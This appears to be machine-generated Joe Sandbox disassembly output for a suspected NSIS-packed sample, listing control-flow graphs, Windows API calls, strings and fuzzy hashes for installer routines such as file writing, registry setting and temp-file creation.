                                                        control_flow_graph 812 4066df-4066e8 813 4066ea-4066f9 812->813 814 4066fb-406715 812->814 813->814 815 406925-40692b 814->815 816 40671b-406727 814->816 818 406931-40693e 815->818 819 406739-406746 815->819 816->815 817 40672d-406734 816->817 817->815 821 406940-406945 call 4066a2 818->821 822 40694a-40694d 818->822 819->818 820 40674c-406755 819->820 823 406912 820->823 824 40675b-40679e 820->824 821->822 826 406920-406923 823->826 827 406914-40691e 823->827 828 4067a4-4067b0 824->828 829 4068b6-4068ba 824->829 826->815 827->815 830 4067b2 828->830 831 4067ba-4067bc 828->831 832 4068bc-4068c3 829->832 833 4068ee-4068f2 829->833 830->831 838 4067f6-4067f9 831->838 839 4067be-4067dc call 406570 831->839 836 4068d3-4068df call 4066a2 832->836 837 4068c5-4068d1 call 4065e9 832->837 834 406902-406910 lstrlenW 833->834 835 4068f4-4068fd call 4066df 833->835 834->815 835->834 846 4068e4-4068ea 836->846 837->846 840 4067fb-406807 GetSystemDirectoryW 838->840 841 40680c-40680f 838->841 851 4067e1-4067e4 839->851 847 406899-40689c 840->847 848 406821-406825 841->848 849 406811-40681d GetWindowsDirectoryW 841->849 846->834 852 4068ec 846->852 853 4068ae-4068b4 call 406950 847->853 854 40689e-4068a1 847->854 848->847 855 406827-406845 848->855 849->848 851->854 856 4067ea-4067f1 call 4066df 851->856 852->853 853->834 854->853 858 4068a3-4068a9 lstrcatW 854->858 860 406847-40684d 855->860 861 406859-406871 call 406a96 855->861 856->847 858->853 865 406855-406857 860->865 869 406873-406886 SHGetPathFromIDListW CoTaskMemFree 861->869 870 406888-406891 861->870 865->861 867 406893-406897 865->867 867->847 869->867 869->870 870->855 870->867
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406801
                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                        • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406875
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                        • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 4024019347-1230650788
                                                        • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                        • Instruction ID: c05bc8db6a500faa8ceae89892d654845b9b7d80f8daaf315b7a9d2c48b59061
                                                        • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                        • Instruction Fuzzy Hash: CE6147B2A053019BEB20AF24DC84B6B77D8AF54314F26453FF587B26D0DA3C8961875E

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 871 401794-4017b9 call 402dcb call 405fe8 876 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 871->876 877 4017bb-4017c1 call 4066a2 871->877 882 4017da-4017db call 406950 876->882 877->882 886 4017e0-4017e4 882->886 887 4017e6-4017f0 call 4069ff 886->887 888 401817-40181a 886->888 896 401802-401814 887->896 897 4017f2-401800 CompareFileTime 887->897 889 401822-40183e call 406192 888->889 890 40181c-40181d call 40616d 888->890 898 401840-401843 889->898 899 4018b2-4018db call 405727 call 403396 889->899 890->889 896->888 897->896 900 401894-40189e call 405727 898->900 901 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 898->901 911 4018e3-4018ef SetFileTime 899->911 912 4018dd-4018e1 899->912 913 4018a7-4018ad 900->913 901->886 933 401889-40188a 901->933 915 4018f5-401900 CloseHandle 911->915 912->911 912->915 916 402c58 913->916 918 401906-401909 915->918 919 402c4f-402c52 915->919 920 402c5a-402c5e 916->920 922 40190b-40191c call 4066df lstrcatW 918->922 923 40191e-401921 call 4066df 918->923 919->916 930 401926-4023bd 922->930 923->930 934 4023c2-4023c7 930->934 935 4023bd call 405d02 930->935 933->913 936 40188c-40188d 933->936 934->920 935->934 936->900
                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\fllesskabsejede\Modfaldent,?,?,00000031), ref: 004017D5
                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\fllesskabsejede\Modfaldent,?,?,00000031), ref: 004017FA
                                                          • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                          • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                          • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                          • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                          • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp$C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp\System.dll$C:\Users\user\fllesskabsejede\Modfaldent$Call
                                                        • API String ID: 1941528284-3894218804
                                                        • Opcode ID: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                        • Instruction ID: adf8bb8e975ebc770d7c27afbe064fe35cfd0cbf1071ecc95f96a86e7a4b9e55
                                                        • Opcode Fuzzy Hash: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                        • Instruction Fuzzy Hash: 8A41C671900105BACF117BA5CD85DAE3A79EF45368F21823FF422B10E1D73D8E91AA2D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 937 402711-40272a call 402da9 940 402730-402737 937->940 941 402c4f-402c52 937->941 943 402739 940->943 944 40273c-40273f 940->944 942 402c58-402c5e 941->942 943->944 946 4028a3-4028ab 944->946 947 402745-402754 call 406602 944->947 946->941 947->946 950 40275a 947->950 951 402760-402764 950->951 952 4027f9-4027fc 951->952 953 40276a-402785 ReadFile 951->953 955 402814-402824 call 406215 952->955 956 4027fe-402801 952->956 953->946 954 40278b-402790 953->954 954->946 958 402796-4027a4 954->958 955->946 964 402826 955->964 956->955 959 402803-40280e call 406273 956->959 961 4027aa-4027bc MultiByteToWideChar 958->961 962 40285f-40286b call 4065e9 958->962 959->946 959->955 961->964 965 4027be-4027c1 961->965 962->942 968 402829-40282c 964->968 969 4027c3-4027ce 965->969 968->962 971 40282e-402833 968->971 969->968 972 4027d0-4027f5 SetFilePointer MultiByteToWideChar 969->972 973 402870-402874 971->973 974 402835-40283a 971->974 972->969 975 4027f7 972->975 977 402891-40289d SetFilePointer 973->977 978 402876-40287a 973->978 974->973 976 40283c-40284f 974->976 975->964 976->946 979 402851-402857 976->979 977->946 980 402882-40288f 978->980 981 40287c-402880 978->981 979->951 982 40285d 979->982 980->946 981->977 981->980 982->946
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                          • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        • API String ID: 163830602-2366072709
                                                        • Opcode ID: f4cc411d6a691ff0d779ee2962e3d04b2c777b5052aec2b7df3f44af6f7597f5
                                                        • Instruction ID: 77fbecb4268093b3ffff8c623a80bd5bb6512b600f7762490a4bde5bc174ce64
                                                        • Opcode Fuzzy Hash: f4cc411d6a691ff0d779ee2962e3d04b2c777b5052aec2b7df3f44af6f7597f5
                                                        • Instruction Fuzzy Hash: 9A511D75D04219AADF20EFD4CA85AAEBB79FF44304F14817BE501B62D0D7B89D82CB58

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 983 406a26-406a46 GetSystemDirectoryW 984 406a48 983->984 985 406a4a-406a4c 983->985 984->985 986 406a5d-406a5f 985->986 987 406a4e-406a57 985->987 989 406a60-406a93 wsprintfW LoadLibraryExW 986->989 987->986 988 406a59-406a5b 987->988 988->989
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                        • wsprintfW.USER32 ref: 00406A78
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME
                                                        • API String ID: 2200240437-1106614640
                                                        • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                        • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                        • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                        • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 990 738b1817-738b1856 call 738b1bff 994 738b185c-738b1860 990->994 995 738b1976-738b1978 990->995 996 738b1869-738b1876 call 738b2480 994->996 997 738b1862-738b1868 call 738b243e 994->997 1002 738b1878-738b187d 996->1002 1003 738b18a6-738b18ad 996->1003 997->996 1006 738b1898-738b189b 1002->1006 1007 738b187f-738b1880 1002->1007 1004 738b18af-738b18cb call 738b2655 call 738b1654 call 738b1312 GlobalFree 1003->1004 1005 738b18cd-738b18d1 1003->1005 1030 738b1925-738b1929 1004->1030 1008 738b191e-738b1924 call 738b2655 1005->1008 1009 738b18d3-738b191c call 738b1666 call 738b2655 1005->1009 1006->1003 1010 738b189d-738b189e call 738b2e23 1006->1010 1012 738b1888-738b1889 call 738b2b98 1007->1012 1013 738b1882-738b1883 1007->1013 1008->1030 1009->1030 1023 738b18a3 1010->1023 1026 738b188e 1012->1026 1018 738b1890-738b1896 call 738b2810 1013->1018 1019 738b1885-738b1886 1013->1019 1029 738b18a5 1018->1029 1019->1003 1019->1012 1023->1029 1026->1023 1029->1003 1033 738b192b-738b1939 call 738b2618 1030->1033 1034 738b1966-738b196d 1030->1034 1040 738b193b-738b193e 1033->1040 1041 738b1951-738b1958 1033->1041 1034->995 1036 738b196f-738b1970 GlobalFree 1034->1036 1036->995 1040->1041 1043 738b1940-738b1948 1040->1043 1041->1034 1042 738b195a-738b1965 call 738b15dd 1041->1042 1042->1034 1043->1041 1045 738b194a-738b194b FreeLibrary 1043->1045 1045->1041
                                                        APIs
                                                          • Part of subcall function 738B1BFF: GlobalFree.KERNEL32(?), ref: 738B1E74
                                                          • Part of subcall function 738B1BFF: GlobalFree.KERNEL32(?), ref: 738B1E79
                                                          • Part of subcall function 738B1BFF: GlobalFree.KERNEL32(?), ref: 738B1E7E
                                                        • GlobalFree.KERNEL32(00000000), ref: 738B18C5
                                                        • FreeLibrary.KERNEL32(?), ref: 738B194B
                                                        • GlobalFree.KERNEL32(00000000), ref: 738B1970
                                                          • Part of subcall function 738B243E: GlobalAlloc.KERNEL32(00000040,?), ref: 738B246F
                                                          • Part of subcall function 738B2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,738B1896,00000000), ref: 738B28E0
                                                          • Part of subcall function 738B1666: wsprintfW.USER32 ref: 738B1694
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                        • String ID:
                                                        • API String ID: 3962662361-3916222277
                                                        • Opcode ID: b36c86d216ed01b6b61d71db4dac89d855c86f97cf2834cadb126a9f7ae5422a
                                                        • Instruction ID: e7ed37583a8c92e19f8fd404cbafe191aaf984f456eeaa6916a9e24fbcf2cbdc
                                                        • Opcode Fuzzy Hash: b36c86d216ed01b6b61d71db4dac89d855c86f97cf2834cadb126a9f7ae5422a
                                                        • Instruction Fuzzy Hash: 4C41A07240038B9BEB119FE8D885B8937BFBB05350F188565E94B9E3C6DB7C9185C7A0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1047 4024af-4024e0 call 402dcb * 2 call 402e5b 1054 4024e6-4024f0 1047->1054 1055 402c4f-402c5e 1047->1055 1056 4024f2-4024ff call 402dcb lstrlenW 1054->1056 1057 402503-402506 1054->1057 1056->1057 1060 402508-402519 call 402da9 1057->1060 1061 40251a-40251d 1057->1061 1060->1061 1065 40252e-402542 RegSetValueExW 1061->1065 1066 40251f-402529 call 403396 1061->1066 1069 402544 1065->1069 1070 402547-402628 RegCloseKey 1065->1070 1066->1065 1069->1070 1070->1055
                                                        APIs
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000023,00000011,00000002), ref: 004024FA
                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000000,00000011,00000002), ref: 0040253A
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CloseValuelstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp
                                                        • API String ID: 2655323295-1944480652
                                                        • Opcode ID: 2d77ac209ad71615f5808e7cf79d7c16757800db2c4d3381873f5c9cabcdec34
                                                        • Instruction ID: bf0ef5d62df918b2bfabe39acf8ac680016d82ecec6d2e1c9a4cf4f2d71e963b
                                                        • Opcode Fuzzy Hash: 2d77ac209ad71615f5808e7cf79d7c16757800db2c4d3381873f5c9cabcdec34
                                                        • Instruction Fuzzy Hash: 2911A231D00115BEEB10AFA58E4AAAEB6B4EB44318F21443FF404B71D1C7B88E419668

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1072 4061c1-4061cd 1073 4061ce-406202 GetTickCount GetTempFileNameW 1072->1073 1074 406211-406213 1073->1074 1075 406204-406206 1073->1075 1077 40620b-40620e 1074->1077 1075->1073 1076 406208 1075->1076 1076->1077
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004061DF
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403663,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F), ref: 004061FA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-1857211195
                                                        • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                        • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                        • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                        • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1162 4015e6-4015fa call 402dcb call 40601c 1167 401656-401659 1162->1167 1168 4015fc-40160f call 405f9e 1162->1168 1170 401688-40231b call 401423 1167->1170 1171 40165b-40167a call 401423 call 4066a2 SetCurrentDirectoryW 1167->1171 1177 401611-401614 1168->1177 1178 401629-40162c call 405c50 1168->1178 1186 402c4f-402c5e 1170->1186 1171->1186 1188 401680-401683 1171->1188 1177->1178 1179 401616-40161d call 405c6d 1177->1179 1185 401631-401633 1178->1185 1179->1178 1192 40161f-401622 call 405bf6 1179->1192 1189 401635-40163a 1185->1189 1190 40164c-401654 1185->1190 1188->1186 1193 401649 1189->1193 1194 40163c-401647 GetFileAttributesW 1189->1194 1190->1167 1190->1168 1197 401627 1192->1197 1193->1190 1194->1190 1194->1193 1197->1185
                                                        APIs
                                                          • Part of subcall function 0040601C: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 0040602A
                                                          • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                          • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                          • Part of subcall function 00405BF6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C38
                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\fllesskabsejede\Modfaldent,?,00000000,000000F0), ref: 00401672
                                                        Strings
                                                        • C:\Users\user\fllesskabsejede\Modfaldent, xrefs: 00401665
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\fllesskabsejede\Modfaldent
                                                        • API String ID: 1892508949-4287445359
